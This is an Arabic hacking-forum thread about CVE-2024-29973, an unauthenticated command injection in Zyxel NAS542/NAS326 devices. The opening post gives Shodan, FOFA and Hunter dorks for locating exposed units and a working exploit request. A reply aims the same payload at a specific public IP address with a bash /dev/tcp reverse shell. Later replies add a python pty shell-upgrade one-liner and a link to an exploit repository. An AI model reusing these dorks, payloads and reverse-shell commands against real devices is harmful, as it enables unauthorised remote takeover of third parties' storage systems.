مضى على الشبكة و يوم من العطاء.

  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

[ ثغرة ] CVE-2024-29973 Unauth inject Zyxel NAS + الاستغلال

STORM

STORMSTORM is verified member.

>_ عضو ماسي _<
>:: v1p ::<

السمعة:

ba4f3d55fce91.webp


دورك البحث :
JavaScript: 
Dorks:
Hunter: http://product.name="ZyXEL NAS542"||http://product.name="ZyXEL NAS326"
FOFA: app="NAS542" || app="ZYXEL-NAS326"
SHODAN: http.title:"Zyxel NAS326"

الاستغلال :

كود: 
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1

الاثبات | POC :

1719008689221.webp


لا تنسوا اخواننا في غزة وادلب والسودان من دعائكم وسائر بلاد المسلمين

548600.webp
 
اممممم الاشياء المحبوبة
اعتقد لسة نازلة
اشغلال اخر
https://github.com/bigb0x/CVE-2024-29973

في اشياء حلوة راح انزلها بخصوص رواتر Technicolor Td5130
من اختراق الوايفاي لتفكيك الفيرموير و الوصول للسورس ثم اكتشاف ثغرة داخلية Command Injection
وايضا محاولة انشاء كيجن لرمز wps انطلاقا من Mac Address

ادعوا لي تتعدل اموري
راح اغرقكم بخور و طلاسم و تعويذات هكورية . . ^^
 
ErrorBinary قال:
اممممم الاشياء المحبوبة
اعتقد لسة نازلة
اشغلال اخر
https://github.com/bigb0x/CVE-2024-29973

في اشياء حلوة راح انزلها بخصوص رواتر Technicolor Td5130
من اختراق الوايفاي لتفكيك الفيرموير و الوصول للسورس ثم اكتشاف ثغرة داخلية Command Injection
وايضا محاولة انشاء كيجن لرمز wps انطلاقا من Mac Address

ادعوا لي تتعدل اموري
راح اغرقكم بخور و طلاسم و تعويذات هكورية . . ^^
أنقر للتوسيع...
اي شي يخص الحقن رائع , لان اقل impact يكون قراءة ملفات فبيساعد كثير في التقدم داخل الهدف ..
اما الثغرة نعم انها لازالت جديدة و عدد الاجهزة كثيرة > في الاسفل مثال لجهاز مصاب و مكان الامر في حال تريد عمل اتصال عكسي لسببِ ما :3

كود: 
http://89.251.145.82:8000/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("sh -i >& /dev/tcp/10.10.10.10/9001 0>&1",+shell=True)%23

إضغط هنا ايضاً لعمل ls
 
OldMe قال:
sh -i >& /dev/tcp/10.10.10.10/9001 0>&1
أنقر للتوسيع...

ف العصور القديمة [هههه] كان ال باك كنكشن من هموم الهكر
وكانت هادي من كنوز البرايفت لغاية ما سربها صاحب بنتستمانكي مع تجميعية اخرى
Reverse Shell Cheat Sheet
وفي كمان كنز اخر اياميها
كود: 
 python3.1 -c 'import pty; pty.spawn("/bin/sh")'
هادي تجيب لك TTY من تحث الارض
 
التعديل الأخير:
ErrorBinary قال:
اممممم الاشياء المحبوبة
اعتقد لسة نازلة
اشغلال اخر
https://github.com/bigb0x/CVE-2024-29973

في اشياء حلوة راح انزلها بخصوص رواتر Technicolor Td5130
من اختراق الوايفاي لتفكيك الفيرموير و الوصول للسورس ثم اكتشاف ثغرة داخلية Command Injection
وايضا محاولة انشاء كيجن لرمز wps انطلاقا من Mac Address

ادعوا لي تتعدل اموري
راح اغرقكم بخور و طلاسم و تعويذات هكورية . . ^^
أنقر للتوسيع...
ان شاء الله تتعدل امورك وربنا يفرجها عليك من اوسع الابواب وسائر المسلمين
ننتظرك والله بفارغ الصبر <3
 
ErrorBinary قال:
ف العصور القديمة [هههه] كان ال باك كنكشن من هموم الهكر
وكانت هادي من كنوز البرايفت لغاية ما سربها صاحب بنتستمانكي مع تجميعية اخرى
Reverse Shell Cheat Sheet
وفي كمان كنز اخر اياميها
كود: 
 python3.1 -c 'import pty; pty.spawn("/bin/sh")'
هادي تجيب لك TTY من تحث الارض
أنقر للتوسيع...
ذكرتني بايام ال2009 وبرايفت الصاعقة وامان العرب :(
 
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.

آخر المشاركات

فانوس

رمضان

الأعضاء المتصلون

المجموع: 53 (الأعضاء: 2, الزوار: 51)

إحصائيات المنتدى

المواضيع
3,140
المشاركات
15,461
الأعضاء
4,783
آخر عضو مسجل
00560

إعلانات

عودة
أعلى